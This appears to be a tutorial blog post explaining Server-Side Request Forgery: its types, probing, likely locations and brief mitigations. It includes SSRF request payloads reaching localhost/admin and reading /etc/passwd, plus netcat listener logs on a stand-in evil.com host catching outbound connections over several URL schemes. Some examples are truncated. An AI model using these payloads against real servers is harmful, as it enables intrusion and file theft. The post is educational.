The Server Side Request Forgery or SSRF is a web application or a web server vulnerability that allows attackers to gain control inter-server requests from the vulnerable server. In other words, The vulnerability in a web server or in a web application allows attackers to send requests made by the web application. The end target always an internal system that holds data and sits behind the firewall, IDS or IPS etc and thus is inaccessible from the internet.
Well, in a simple term, an attacker sits in his desk and orders a webserver to do the job on his behalf.
As I mentioned above, the targets systems often stays behind the firewall or IDS or IPS, thus, the attacker cannot send direct requests to his victim’s server, he has to make sure that the target machine is exploitable. So he does the following to scan the network.
- Send a request to the vulnerable web server that abuses the SSRF vulnerability.
- The web server makes a request to the victim’s server which sits behind a firewall.
- The victim’s server responds with the data.
- If the SSRF vulnerability in the server permits it, the response is sent back to the attacker.
- The attacker modifies the request and gains access using different methodologies.
Impacts of SSRF Exploit
- Hackers will be able to scan local or external network
- Hackers will be able to read files from the exploited server
- Hackers will be able to take control of internal systems and network
- Using SSRF exploit hacker will be able to perform remote code execution
Types of SSRF?
There are a couple of SSRF types normally used to carry-out the attack.
The Direct SSRF can be done using the couple of different ways. A (a) Content based SSRF and (b) Boolean based SSRF.
The Content based SSRF is a widely used attack type where the attacker uses the content of the URL in the server’s response to carry an attack.
The Boolean based attack carried when a specific URL is unreachable, or when the server sends an error message/ response code to attackers request. The attacker then uses the response codes like 404 or 500 to carry out the exploit.
The Indirect SSRF also known as Blind SSRF because of this type of attack carried-out without getting any status code/response from the target. For example, the attacker is unaware if the target server is up or down as there is no status code, or response is sent back from the server to identify if it is running.
The attacker normally carries out the attack based on the time difference to rectify the target machine’s status. The attacker keeps trying a number of times until the connection is closed. As I said above, he uses the difference in time to confirm whether the target host is up. If the target takes a lot of time to respond, the attacker confirms the specified host is down. The indirect SSRF is the most difficult type to exploit as there is no response from the server, so the “guessing” game works here.
How to perform SSRF Exploit
Every exploit has a numerous method of probing before it becomes an “Exploit”. The hacker practices different types of techniques on his target until he gets the right exploit to work on. The same works with SSRF. The process of enumerating the target called probing.
In the SSRF probing, attacker sends a request using a specific URL as a “Payload” through HTTP GET parameter or what we call an HTTP POST data – commonly known as “SSRF Vector”. Normally the payloads contain special characters such a “?” or “#” etc.
POST /product/stock HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 118 stockApi=http://stock.mybestsstoreever.com/product/stock/check%3FproductId%3D6%26storeId%3D1
The above code is a simple request that makes a request to server sung a specific URL and the web server returns with a response “stock status” to the requesting user’s browser/ or an app. If the webserver can be exploitable to SSRF, the attacker can modify the request using tools like BURP Suite by intercepting the request and modifying it like below.
POST /product/stock HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 118 stockApi=http://localhost/admin
The vulnerable server in returns fetch the contents of the localhost/admin URL and return it to the user. – This is called
Where You Can Find SSRF Vulnerabilities
- Normally, you can find SSRF vuln, where there is a possibility of network request to an internal server from the Internet.
- All the requests from a remote server (Upload files etc)
- Where there are apps running using databases such as Oracle, MongoDB, MS SQL and Postgres etc
- Email servers
- File processing, encoding processing, attribute information processing. etc.
Different ways of SSRF Exploits
SSRF to Reflected XSS (SSRF to Cross-Site Scripting)
Simply fetch a file from external sites which has malicious payload with content type served as html. Example – http://vuln-web-appcom:4200/?url=http://letmehackyourserver.com/virus.svg
The file payload is used to fetch a file from the server file system.
http://example.com/vuln-ssrf.php?url=file:///etc/passwd and or http://example.com/vuln-ssrf.php?url=file:///C:/Windows/win.ini
The output of
http://localost/ssrf.php?image_url=file:///etc/passwd would be someting like this:
DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 31126)
CLIENT libcurl 7.40.0
Sftp stands for SSH File Transfer Protocol, or Secure File Transfer Protocol, is a separate protocol packaged with SSH that works in a similar way over a secure connection.
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 37146)
ldap:// or ldaps:// or ldapi:// –
LDAP stands for Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
Trivial File Transfer Protocol is a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host
evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port 1337)
Gopher, is a distributed document delivery service. It allows users to explore, search and retrieve information residing on different locations in a seamless fashion.
(host it on acttacker.com):-
evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)
For more Refer here
Scan for internal networks and ports –
What if they are running some servers in their LAN (Kibana, Elastic Search,MongoDB.. )
Which we can not access from internet directly as firewall blocks them
- Disable unused URL schemas
- Password protect the Internal services and add an extra layer of protection like IDS.